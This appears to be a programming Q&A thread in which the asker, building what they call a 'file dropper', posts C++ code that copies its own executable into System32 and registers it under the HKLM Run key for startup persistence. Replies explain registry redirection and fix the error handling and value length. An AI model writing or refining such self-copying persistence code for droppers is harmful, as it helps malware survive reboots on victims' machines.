# I do not see registry key even though GetLastError returns all 0

Tags: c++, windows, api, registry, regedit

I try to make file dropper and launch at startup but then it DOES start up correctly but when i navigate to said key using regedit i cannot see it? What is up with that? All error codes return 0.....

```
#include <iostream>
#include <windows.h>
#include <Shlwapi.h>
using namespace std;
string RegistryKeyName = "testdropper.exe";

int main()
{
    std::string filename ="\\";
    char system[MAX_PATH];
    char pathtofile[MAX_PATH];
    memset(system, 0, MAX_PATH);
    memset(pathtofile, 0, MAX_PATH);


    //GET MODULE HANDLE OF CALLING PROGRAM I.E SERVER.EXE'S HANDLE
    HMODULE GetModH = GetModuleHandle(NULL);

cout << GetLastError();
    //GET PATH OF exe
    GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));

    filename.append(PathFindFileNameA(pathtofile));

    //GET SYSTEM DIRECTORY LIKE SYSTEM32
    GetSystemDirectory(system,sizeof(system));

    //APPEND MY FILENAME AFTER THE SYSTEMDIRECTORY 
    strcat(system, filename.c_str());

    //COPY SERVER TO THE SYSTEM32 FOLDER
    CopyFile(pathtofile,system,false);

    //MAKE A REGISTRY KEY TO THE SYSTEM32FOLDER WITH SERVER.EXE TO RUN AT STARTUP
    HKEY hKey;

    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

    RegSetValueEx(hKey, RegistryKeyName.c_str(),0,REG_SZ,(const BYTE*)system,sizeof(system));

    RegCloseKey(hKey);


     return 0;
}
```

Comment: I can't see any checking of return codes in the source you posted - is this what you actually ran?

Comment: Have you checked HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run ? It may be a 32b app running in x64?

Comment: yes its in wow64. i posted a comment but it got deleted/didnt show up.

Answer (score 2):

> ... even though GetLastError returns all 0

`RegXxx` API functions typically return error codes directly in returned value, not via `GetLastError`.

A frequent error you might have working with HKLM is insufficient access rights.

Answer (score 0):

You have two bugs in your code:

1. you don't check for errors.
2. you are not writing the string value correctly.

Try this:

```
long ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
if (ret != ERROR_SUCCESS)
{
    cout << "Unable to open key. Error " << ret;
}
else
{
    ret = RegSetValueEx(hKey, RegistryKeyName.c_str(), 0, REG_SZ, (const BYTE*) system, strlen(system)+1);
    if (ret != ERROR_SUCCESS)
        cout << "Unable to write to key. Error " << ret;

    RegCloseKey(hKey);
}
```